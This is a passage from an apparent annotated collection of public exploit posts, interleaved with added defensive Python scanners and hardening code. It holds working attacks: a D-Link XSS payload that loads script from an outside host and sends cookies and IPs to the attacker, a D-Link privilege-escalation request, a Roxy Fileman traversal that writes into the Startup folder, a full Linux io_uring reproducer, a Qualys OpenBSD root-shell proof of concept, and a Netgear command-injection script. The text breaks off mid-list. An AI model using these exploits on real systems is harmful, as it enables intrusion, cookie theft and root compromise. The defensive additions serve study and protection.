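    """Walk the segments with a depth counter; the first '..' that would
    pop above the document root marks the request as traversal."""
    depth = 0
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def scan_log(text: str) -> list:
    """One finding per request whose normalized path leaves the root.
    'served' is True for a 2xx answer, the case worth paging on."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = normalize_path(m.group("target"))
        if escapes_root(path):
            findings.append({
                "client": line.split(" ", 1)[0],
                "raw": m.group("target"),
                "normalized": path,
                "status": int(m.group("status")),
                "served": m.group("status").startswith("2"),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "SERVED" if f["served"] else "blocked"
        print(f'{f["client"]:<10} {flag:<8} {f["normalized"]}')
```

The depth counter is deliberately used instead of a substring match for `../`: it ignores `..` that stays inside the root (`/a/b/../c`) and still catches the encoded forms once they are decoded. On a server such as JAWS/1.0 or NVMS-1000 that serves the file, the 200 status on the two `10.0.0.7` lines is the confirmation; the 403/404 lines are attempts that failed and are useful only for attribution.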
  12. # Exploit Title: D-Link DIR-615 Wireless Router - Persistent Cross-Site Scripting
# Date: 2019-12-13
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: CVE-2019-19742

Reproduction Steps:

1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
2. Go to the Maintenance page and click on Admin on the left panel
3. Put the blind XSS payload into the name field: "><script src=https://ptguy.xss.ht></script>. This payload is saved by the server and reflected in the user page.
4. On every refresh of the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker.
5. For HTML injection, just put <b> Testing </b> in the username field; you will get the username in bold on your homepage.

#Burp Intercept

POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1

username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
  13. # Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal
# Author: Patrik Lantz
# Date: 2019-12-06
# Software: Roxy Fileman
# Version: 1.4.5
# Vendor Homepage: http://www.roxyfileman.com/
# Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net
# CVE: CVE-2019-19731

Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134
(using custom account as application pool identity for the IIS worker process).

===========================
Description
===========================

Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to
file write in arbitrary locations depending on the IIS worker process
privileges. This PoC demonstrates a crafted Windows shortcut file being
uploaded and written to the Startup folder. The execution of this file will be
triggered on the next login.

Proof of Concept
===========================

It's possible to write an uploaded file to arbitrary locations using the
RENAMEFILE action. The RenameFile function in main.ashx does not check if the
new file name 'name' is a valid location. Moreover, the default conf.json has
an incomplete blacklist for file extensions which in this case allows Windows
shortcut files to be uploaded; alternatively, existing files can be renamed to
include the .lnk extension.

1) Create a shortcut file

By using for example the target executable C:\Windows\System32\Calc.exe
Remove the .lnk extension and rename it to use the .dat extension.

2) Upload the file

Either upload the .dat file manually via the Roxy Fileman web interface or
programmatically using a HTTP POST request.

Details of the request:

POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------159382831523528
Content-Length: 924
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list

-----------------------------159382831523528
Content-Disposition: form-data; name="action"

upload
-----------------------------159382831523528
Content-Disposition: form-data; name="method"

ajax
-----------------------------159382831523528
Content-Disposition: form-data; name="d"

/wwwroot/fileman/Uploads/test2
-----------------------------159382831523528
Content-Disposition: form-data; name="files[]"; filename="poc.dat"
Content-Type: application/octet-stream

...data omitted...
-----------------------------159382831523528--

3) Write the file to the Startup folder using the RENAMEFILE action

The new filename is set via the n parameter. The correct path can be
identified by trial and error depending on the location of wwwroot on the
filesystem and the privileges for the IIS worker process (w3wp.exe). If the
necessary directories do not exist, they can be created using the CREATEDIR
action which also is vulnerable to path traversal.

POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list

f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat

Workaround / Fix:
===========================

Patch the main.ashx code to check that all paths are valid in the following
actions: CREATEDIR, COPYFILE and RENAMEFILE.

Recommendations for users of Roxy Fileman:
- Add the lnk file extension to the conf.json under FORBIDDEN_UPLOADS, and
  aspx since it is not included in the blacklist by default.

Timeline
===========================

2019-12-06: Discovered the vulnerability
2019-12-06: Reported to the vendor (vendor is unresponsive)
2019-12-11: Request CVE
2019-12-13: Advisory published

Discovered By:
===========================

Patrik Lantz
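The fix the advisory asks for is a containment check on every path that CREATEDIR, COPYFILE and RENAMEFILE touch, plus a deny list that covers .lnk and .aspx. The block below is an added illustration of that check, written in Python rather than the C# of main.ashx; it is not Roxy Fileman's code, the `FORBIDDEN_EXT` set is a constructed deny list (it includes the lnk and aspx entries the post recommends, the rest are assumptions), and the function names are hypothetical. It runs against a throwaway upload root in a temp directory and replays the three requests from the post: the traversal rename into the Startup folder, a rename to a .lnk name, and a directory path that climbs out of the root.

```python
import os
import re
import tempfile

# Constructed deny list (not Roxy Fileman's conf.json): the post's workaround
# adds lnk and aspx to FORBIDDEN_UPLOADS, so both are included here.
FORBIDDEN_EXT = {"lnk", "aspx", "asp", "ashx", "asmx", "exe", "dll",
                 "bat", "cmd", "ps1", "php", "js", "config"}


class PathRejected(ValueError):
    """Raised for any name that must not be written through the file manager."""


def forbidden_extension(filename: str) -> bool:
    """True if any dotted suffix is on the deny list, so 'poc.txt.lnk' and
    'shell.aspx.txt' are both rejected, not only the final extension."""
    suffixes = os.path.basename(filename).lower().split(".")[1:]
    return any(s in FORBIDDEN_EXT for s in suffixes)


def resolve_inside(base_dir: str, relative: str) -> str:
    """Resolve `relative` against base_dir and return the absolute path only
    if the result is still inside base_dir (the check main.ashx lacks)."""
    rel = relative.replace("\\", "/")
    if ("\x00" in rel or rel.startswith("/") or re.match(r"^[A-Za-z]:", rel)
            or os.path.isabs(rel)):
        raise PathRejected("absolute or malformed path")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, rel))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:          # different drives on Windows
        inside = False
    if not inside:
        raise PathRejected(f"{relative!r} resolves outside the upload root")
    return candidate


def rename_file(base_dir: str, old_rel: str, new_name: str) -> str:
    """Hardened RENAMEFILE: the source must sit inside the root, the new name
    must be a bare filename, and it must not be a forbidden type."""
    if any(sep in new_name for sep in ("/", "\\")) or new_name in ("", ".", ".."):
        raise PathRejected("new name must be a plain filename")
    if forbidden_extension(new_name):
        raise PathRejected("forbidden file type")
    src = resolve_inside(base_dir, old_rel)
    dst = os.path.join(os.path.dirname(src), new_name)
    os.rename(src, dst)
    return dst


def demo() -> dict:
    """Exercise the checks against a constructed upload root in a temp dir."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "Uploads")
    os.makedirs(os.path.join(uploads, "test2"))
    open(os.path.join(uploads, "test2", "poc.dat"), "wb").close()

    def attempt(fn, *args):
        try:
            fn(*args)
            return "allowed"
        except PathRejected:
            return "rejected"

    # The n= value from the advisory's RENAMEFILE request
    startup = ("../../../../../../../../AppData/Roaming/Microsoft/Windows/"
               "Start Menu/Programs/Startup/poc.txt.lnk")
    return {
        "traversal_rename": attempt(rename_file, uploads, "test2/poc.dat", startup),
        "lnk_rename": attempt(rename_file, uploads, "test2/poc.dat", "poc.lnk"),
        "traversal_createdir": attempt(resolve_inside, uploads, "../../outside"),
        "plain_rename": os.path.basename(rename_file(uploads, "test2/poc.dat", "notes.txt")),
    }


if __name__ == "__main__":
    for action, outcome in demo().items():
        print(f"{action:<20} {outcome}")
```

Two design points carry over regardless of language: the containment test compares canonicalized paths (`realpath` on both sides) so symlinks and `..` are resolved before the comparison, and the extension check looks at every suffix rather than the last one, because the advisory's payload name `poc.txt.lnk` is exactly the shape a last-suffix check misjudges.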
  14. Since commit 0fa03c624d8f ("io_uring: add support for sendmsg()", first in
v5.3), io_uring has support for asynchronously calling sendmsg(). Unprivileged
userspace tasks can submit IORING_OP_SENDMSG submission queue entries, which
cause sendmsg() to be called either in syscall context in the original task,
or - if that wasn't able to send a message without blocking - on a kernel
worker thread.

The problem is that sendmsg() can end up looking at the credentials of the
calling task for various reasons; for example:

 - sendmsg() with non-null, non-abstract ->msg_name on an unconnected AF_UNIX
   datagram socket ends up performing filesystem access checks
 - sendmsg() with SCM_CREDENTIALS on an AF_UNIX socket ends up looking at
   process credentials
 - sendmsg() with non-null ->msg_name on an AF_NETLINK socket ends up
   performing capability checks against the calling process

When the request has been handed off to a kernel worker task, all such checks
are performed against the credentials of the worker - which are default kernel
creds, with UID 0 and full capabilities.

To force io_uring to hand off a request to a kernel worker thread, an attacker
can abuse the fact that the opcode field of the SQE is read multiple times,
with accesses to the struct msghdr in between: The attacker can first submit
an SQE of type IORING_OP_RECVMSG whose struct msghdr is in a userfaultfd
region, and then, when the userfaultfd triggers, switch the type to
IORING_OP_SENDMSG.

Here's a reproducer for Linux 5.3 that demonstrates the issue by adding an
IPv4 address to the loopback interface without having the required privileges
for that:

==========================================================================
$ cat uring_sendmsg.c
#define _GNU_SOURCE
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>   /* strerror() */
#include <err.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/ioctl.h>
#include <linux/rtnetlink.h>
#include <linux/if_addr.h>
#include <linux/io_uring.h>
#include <linux/userfaultfd.h>
#include <linux/netlink.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static int uffd = -1;
static struct iovec *iov;
static struct iovec real_iov;
static struct io_uring_sqe *sqes;

static void *uffd_thread(void *dummy) {
  struct uffd_msg msg;
  int res = SYSCHK(read(uffd, &msg, sizeof(msg)));
  if (res != sizeof(msg)) errx(1, "uffd read");
  printf("got userfaultfd message\n");

  sqes[0].opcode = IORING_OP_SENDMSG;

  union {
    struct iovec iov;
    char pad[0x1000];
  } vec = { .iov = real_iov };
  struct uffdio_copy copy = {
    .dst = (unsigned long)iov,
    .src = (unsigned long)&vec,
    .len = 0x1000
  };
  SYSCHK(ioctl(uffd, UFFDIO_COPY, &copy));
  return NULL;
}

int main(void) {
  // initialize uring
  struct io_uring_params params = { };
  int uring_fd = SYSCHK(syscall(SYS_io_uring_setup, /*entries=*/10, &params));
  unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING));
  unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING));
  sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES));

  // prepare userfaultfd-trapped IO vector page
  iov = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  uffd = SYSCHK(syscall(SYS_userfaultfd, 0));
  struct uffdio_api api = { .api = UFFD_API, .features = 0 };
  SYSCHK(ioctl(uffd, UFFDIO_API, &api));
  struct uffdio_register reg = {
    .mode = UFFDIO_REGISTER_MODE_MISSING,
    .range = { .start = (unsigned long)iov, .len = 0x1000 }
  };
  SYSCHK(ioctl(uffd, UFFDIO_REGISTER, &reg));
  pthread_t thread;
  if (pthread_create(&thread, NULL, uffd_thread, NULL)) errx(1, "pthread_create");

  // construct netlink message
  int sock = SYSCHK(socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE));
  struct sockaddr_nl addr = {
    .nl_family = AF_NETLINK
  };
  struct {
    struct nlmsghdr hdr;
    struct ifaddrmsg body;
    struct rtattr opthdr;
    unsigned char addr[4];
  } __attribute__((packed)) msgbuf = {
    .hdr = {
      .nlmsg_len = sizeof(msgbuf),
      .nlmsg_type = RTM_NEWADDR,
      .nlmsg_flags = NLM_F_REQUEST
    },
    .body = {
      .ifa_family = AF_INET,
      .ifa_prefixlen = 32,
      .ifa_flags = IFA_F_PERMANENT,
      .ifa_scope = 0,
      .ifa_index = 1
    },
    .opthdr = {
      .rta_len = sizeof(struct rtattr) + 4,
      .rta_type = IFA_LOCAL
    },
    .addr = { 1, 2, 3, 4 }
  };
  real_iov.iov_base = &msgbuf;
  real_iov.iov_len = sizeof(msgbuf);
  struct msghdr msg = {
    .msg_name = &addr,
    .msg_namelen = sizeof(addr),
    .msg_iov = iov,
    .msg_iovlen = 1,
  };

  // send netlink message via uring
  sqes[0] = (struct io_uring_sqe) {
    .opcode = IORING_OP_RECVMSG,
    .fd = sock,
    .addr = (unsigned long)&msg
  };
  ((int*)(sq_ring + params.sq_off.array))[0] = 0;
  (*(int*)(sq_ring + params.sq_off.tail))++;
  int submitted = SYSCHK(syscall(SYS_io_uring_enter, uring_fd, /*to_submit=*/1, /*min_complete=*/1, /*flags=*/IORING_ENTER_GETEVENTS, /*sig=*/NULL, /*sigsz=*/0));
  printf("submitted %d, getevents done\n", submitted);
  int cq_tail = *(int*)(cq_ring + params.cq_off.tail);
  printf("cq_tail = %d\n", cq_tail);
  if (cq_tail != 1) errx(1, "expected cq_tail==1");
  struct io_uring_cqe *cqe = (void*)(cq_ring + params.cq_off.cqes);
  if (cqe->res < 0) {
    printf("result: %d (%s)\n", cqe->res, strerror(-cqe->res));
  } else {
    printf("result: %d\n", cqe->res);
  }
}
$ gcc -Wall -pthread -o uring_sendmsg uring_sendmsg.c
$ ip addr show dev lo
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
$ ./uring_sendmsg
got userfaultfd message
submitted 1, getevents done
cq_tail = 1
result: 32
$ ip addr show dev lo
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet 1.2.3.4/32 scope global lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
$
==========================================================================

The way I see it, the easiest way to fix this would probably be to grab a
reference to the caller's credentials with get_current_cred() in
io_uring_create(), then let the entry code of all the kernel worker threads
permanently install these as their subjective credentials with
override_creds(). (Or maybe commit_creds() - that would mean that you could
actually see the owning user of these threads in the output of something like
"ps aux". On the other hand, I'm not sure how that impacts stuff like signal
sending, so override_creds() might be safer.) It would mean that you can't
safely use an io_uring instance across something like a setuid() transition
that drops privileges, but that's probably not a big problem?

While the security bug was only introduced by the addition of
IORING_OP_SENDMSG, it would probably be beneficial to mark such a change for
backporting all the way to v5.1, when io_uring was added - I think e.g. the
SELinux hook that is called from rw_verify_area() has so far always attributed
all the I/O operations to the kernel context, which isn't really a security
problem, but might e.g. cause unexpected denials depending on the SELinux
policy.
  15. # Exploit Title: D-Link DIR-615 - Privilege Escalation
# Date: 2019-12-10
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: CVE-2019-19743

# Reproduction Steps:
# Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1]
# Go to the Maintenance page and click on Admin on the left panel.
# There is an option to create a user and by default, it shows only user accounts.
# Create an account with a name (i.e. ptguy) and change the privileges from user to root (admin)
# by changing the privilege id (1 to 2) with Burp Suite.

# Privilege Escalation Post Request

POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1

username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

# Now log in with the newly created root (ptguy) user. You have all administrator rights.
  16. Qualys Security Advisory Local Privilege Escalation in OpenBSD's dynamic loader (CVE-2019-19726) ============================================================================== Contents ============================================================================== Summary Analysis Demonstration Acknowledgments ============================================================================== Summary ============================================================================== We discovered a Local Privilege Escalation in OpenBSD's dynamic loader (ld.so): this vulnerability is exploitable in the default installation (via the set-user-ID executable chpass or passwd) and yields full root privileges. We developed a simple proof of concept and successfully tested it against OpenBSD 6.6 (the current release), 6.5, 6.2, and 6.1, on both amd64 and i386; other releases and architectures are probably also exploitable. ============================================================================== Analysis ============================================================================== In this section, we analyze a step-by-step execution of our proof of concept: ------------------------------------------------------------------------------ 1/ We execve() the set-user-ID /usr/bin/chpass, but first: 1a/ we set the LD_LIBRARY_PATH environment variable to one single dot (the current working directory) and approximately ARG_MAX colons (the maximum number of bytes for the argument and environment list); as described in man ld.so: LD_LIBRARY_PATH A colon separated list of directories, prepending the default search path for shared libraries. This variable is ignored for set-user-ID and set-group-ID executables. 
1b/ we set the RLIMIT_DATA resource limit to ARG_MAX * sizeof(char *) (2MB on amd64, 1MB on i386); as described in man setrlimit: RLIMIT_DATA The maximum size (in bytes) of the data segment for a process; this includes memory allocated via malloc(3) and all other anonymous memory mapped via mmap(2). ------------------------------------------------------------------------------ 2/ Before the main() function of chpass is executed, the _dl_boot() function of ld.so is executed and calls _dl_setup_env(): 262 void 263 _dl_setup_env(const char *argv0, char **envp) 264 { ... 271 _dl_libpath = _dl_split_path(_dl_getenv("LD_LIBRARY_PATH", envp)); ... 283 _dl_trust = !_dl_issetugid(); 284 if (!_dl_trust) { /* Zap paths if s[ug]id... */ 285 if (_dl_libpath) { 286 _dl_free_path(_dl_libpath); 287 _dl_libpath = NULL; 288 _dl_unsetenv("LD_LIBRARY_PATH", envp); 289 } ------------------------------------------------------------------------------ 3/ At line 271, _dl_getenv() returns a pointer to our LD_LIBRARY_PATH environment variable and passes it to _dl_split_path(): 23 char ** 24 _dl_split_path(const char *searchpath) 25 { .. 35 pp = searchpath; 36 while (*pp) { 37 if (*pp == ':' || *pp == ';') 38 count++; 39 pp++; 40 } .. 45 retval = _dl_reallocarray(NULL, count, sizeof(*retval)); 46 if (retval == NULL) 47 return (NULL); ------------------------------------------------------------------------------ 4/ At line 45, count is approximately ARG_MAX (the number of colons in our LD_LIBRARY_PATH) and _dl_reallocarray() returns NULL (because of our low RLIMIT_DATA); at line 47, _dl_split_path() returns NULL. 
------------------------------------------------------------------------------ 5/ As a result, _dl_libpath is NULL (line 271) and our LD_LIBRARY_PATH is ignored, but it is not deleted from the environment (CVE-2019-19726): although _dl_trust is false (_dl_issetugid() returns true because chpass is set-user-ID), _dl_unsetenv() is not called (line 288) because _dl_libpath is NULL (line 285). ------------------------------------------------------------------------------ 6/ Next, the main() function of chpass is executed, and it: 6a/ calls setuid(0), which sets the real and effective user IDs to 0; 6b/ calls pw_init(), which resets RLIMIT_DATA to RLIM_INFINITY; 6c/ calls pw_mkdb(), which vfork()s and execv()s /usr/sbin/pwd_mkdb (unlike execve(), execv() does not reset the environment). ------------------------------------------------------------------------------ 7/ Before the main() function of pwd_mkdb is executed, the _dl_boot() function of ld.so is executed and calls _dl_setup_env(): 7a/ at line 271, _dl_getenv() returns a pointer to our LD_LIBRARY_PATH environment variable (because it was not deleted from the environment in step 5, and because execv() did not reset the environment in step 6c); 7b/ at line 45, _dl_reallocarray() does not return NULL anymore (because our low RLIMIT_DATA was reset in step 6b); 7c/ as a result, _dl_libpath is not NULL (line 271), and it is not reset to NULL (line 287) because _dl_trust is true (_dl_issetugid() returns false because pwd_mkdb is not set-user-ID, and because the real and effective user IDs were both set to 0 in step 6a): our LD_LIBRARY_PATH is not ignored anymore. ------------------------------------------------------------------------------ 8/ Finally, ld.so searches for shared libraries in _dl_libpath (our LD_LIBRARY_PATH) and loads our own library from the current working directory (the dot in our LD_LIBRARY_PATH). 
------------------------------------------------------------------------------

==============================================================================
Demonstration
==============================================================================

In this section, we demonstrate the use of our proof of concept:

------------------------------------------------------------------------------

$ id
uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)

$ cd /tmp

$ cat > lib.c << "EOF"
#include <paths.h>
#include <unistd.h>

static void __attribute__ ((constructor)) _init (void) {
    if (setuid(0) != 0) _exit(__LINE__);
    if (setgid(0) != 0) _exit(__LINE__);
    char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL };
    execve(argv[0], argv, NULL);
    _exit(__LINE__);
}
EOF

$ readelf -a /usr/sbin/pwd_mkdb | grep NEEDED
 0x0000000000000001 (NEEDED)             Shared library: [libutil.so.13.1]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.95.1]

$ gcc -fpic -shared -s -o libutil.so.13.1 lib.c

$ cat > poc.c << "EOF"
#include <string.h>
#include <sys/param.h>
#include <sys/resource.h>
#include <unistd.h>

int main(int argc, char * const * argv) {
#define LLP "LD_LIBRARY_PATH=."
    static char llp[ARG_MAX - 128];
    memset(llp, ':', sizeof(llp)-1);
    memcpy(llp, LLP, sizeof(LLP)-1);
    char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL };

#define DATA (ARG_MAX * sizeof(char *))
    const struct rlimit data = { DATA, DATA };
    if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__);

    if (argc <= 1) _exit(__LINE__);
    argv += 1;
    execve(argv[0], argv, envp);
    _exit(__LINE__);
}
EOF

$ gcc -s -o poc poc.c

$ ./poc /usr/bin/chpass

# id
uid=0(root) gid=0(wheel) groups=32767(nobody)

------------------------------------------------------------------------------

==============================================================================
Acknowledgments
==============================================================================

We thank Theo de Raadt and the OpenBSD developers for their incredibly quick
response: they published a patch for this vulnerability in less than 3 hours.
We also thank MITRE's CVE Assignment Team.
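The mechanism above comes down to a privileged program (chpass) handing its inherited environment, LD_LIBRARY_PATH and EDITOR included, to a child through execv(). The block below is an added example in Python, not code from the Qualys advisory or from OpenBSD, showing the defensive form of that step: a launcher that audits the inherited environment for loader-, shell- and editor-steering variables and hands the child an allowlisted environment with a fixed PATH. The variable lists, the allowlist and the safe PATH are assumptions chosen for illustration.

```python
import subprocess
from typing import Dict, List

# Inherited variables that steer the dynamic loader (LD_*, DYLD_*), the shell
# (IFS, ENV, BASH_ENV, SHELLOPTS), language runtimes, or which program a tool
# like chpass/vipw/crontab spawns (EDITOR, VISUAL, PAGER). Assumed list.
DANGEROUS_PREFIXES = ("LD_", "DYLD_")
DANGEROUS_NAMES = frozenset({
    "IFS", "ENV", "BASH_ENV", "SHELLOPTS", "EDITOR", "VISUAL", "PAGER",
    "PYTHONPATH", "PYTHONHOME", "PERL5LIB", "RUBYLIB",
})

# The only inherited variables a privileged launcher forwards unchanged (assumption).
ALLOWED = frozenset({"TERM", "LANG", "LC_ALL", "TZ", "HOME", "USER", "LOGNAME"})

# PATH is set, never inherited: the attacker controls the parent's PATH as well.
SAFE_PATH = "/usr/bin:/bin:/usr/sbin:/sbin"


def is_dangerous(name: str) -> bool:
    """True if an inherited variable could redirect loading or execution in a child."""
    return name.startswith(DANGEROUS_PREFIXES) or name in DANGEROUS_NAMES


def audit_env(env: Dict[str, str]) -> List[str]:
    """Sorted names of inherited variables that would reach a child and are dangerous."""
    return sorted(name for name in env if is_dangerous(name))


def scrub_env(env: Dict[str, str]) -> Dict[str, str]:
    """Child environment built from the allowlist only, plus a fixed PATH.

    An allowlist also drops variables nobody thought to deny, which is the
    property that matters when the loader's own sanitising has a gap, as it did here.
    """
    clean = {k: v for k, v in env.items() if k in ALLOWED}
    clean["PATH"] = SAFE_PATH
    return clean


def run_helper(argv: List[str], inherited: Dict[str, str]) -> subprocess.CompletedProcess:
    """Spawn a helper with an explicit argv and an explicit environment.

    Passing env= is the execve() form; subprocess with env=None (like execv())
    would hand the child whatever the parent inherited.
    """
    return subprocess.run(argv, env=scrub_env(inherited), capture_output=True,
                          text=True, check=False)


if __name__ == "__main__":
    # Constructed parent environment shaped like the advisory's attacker-supplied envp.
    hostile = {"LD_LIBRARY_PATH": ".", "EDITOR": "echo '#' >>", "PATH": "/tmp:/usr/bin",
               "TERM": "xterm", "HOME": "/nonexistent"}
    print("dangerous inherited variables:", audit_env(hostile))
    print("environment handed to the child:", scrub_env(hostile))
    # Shows only the allowlisted variables and the fixed PATH (needs /usr/bin/env).
    print(run_helper(["/usr/bin/env"], hostile).stdout)
```

The audit is a diagnostic for existing privileged wrappers; the scrub is what the exec path should do. Note that the fix OpenBSD shipped was in ld.so itself; the launcher-side allowlist is a belt-and-braces measure that does not depend on the loader getting every corner case right.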
17. # Exploit Title: Netgear R6400 - Remote Code Execution
# Date: 2019-12-14
# Exploit Author: Kevin Randall
# CVE: CVE-2016-6277
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93

# PoC

#!/usr/bin/python
import urllib2

IP_ADDR = "192.168.1.1"
PROTOCOL = "http://"
DIRECTORY = "/cgi-bin/;"
CMD = "date"

FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD

req = urllib2.Request(url = FULL_URL)
response = urllib2.urlopen(req)
commandoutput = response.read()

spl_word = "}"
formattedoutput = commandoutput
result = formattedoutput.rpartition(spl_word)[2]
print result
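The PoC above rides on the CVE-2016-6277 request shape, a command appended after `/cgi-bin/;`. For the defensive side, the following is an added example in Python (not part of the exploit post) that runs a detection for that shape over web-access-style log lines: it parses Common Log Format, URL-decodes the path once so `%3B` and `;` are treated alike, and reports the injected command. The log lines are constructed for the example, and a router's own logging will differ; the pattern is meant for a proxy, IDS or replayed-pcap feed in front of such devices.

```python
import re
from typing import List, NamedTuple, Optional
from urllib.parse import unquote

# Combined/Common Log Format: src ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?:\s[^"]*)?" (?P<status>\d{3})'
)
# CVE-2016-6277 shape: whatever follows "/cgi-bin/;" is handed to the shell.
INJECTION_RE = re.compile(r'/cgi-bin/;\s*(?P<cmd>[^?#]*)')


class Hit(NamedTuple):
    src: str
    ts: str
    path: str       # path exactly as logged (still URL-encoded)
    status: int
    injected: str   # decoded command text after the semicolon


def extract_injection(path: str) -> Optional[str]:
    """Decode the request path once and return the smuggled command, or None.

    Decoding first means '%3B' and ';' are treated alike; the raw path is kept
    in the Hit so the analyst can pivot back into the original log.
    """
    m = INJECTION_RE.search(unquote(path))
    return m.group("cmd").strip() if m else None


def scan(lines: List[str]) -> List[Hit]:
    """Run the detection over access-log lines; non-CLF lines are skipped, not fatal."""
    hits: List[Hit] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        cmd = extract_injection(m.group("path"))
        if cmd is not None:
            hits.append(Hit(m.group("src"), m.group("ts"), m.group("path"),
                            int(m.group("status")), cmd))
    return hits


# Constructed sample lines; the second mirrors the PoC above, the third an encoded variant.
SAMPLE_LOG = [
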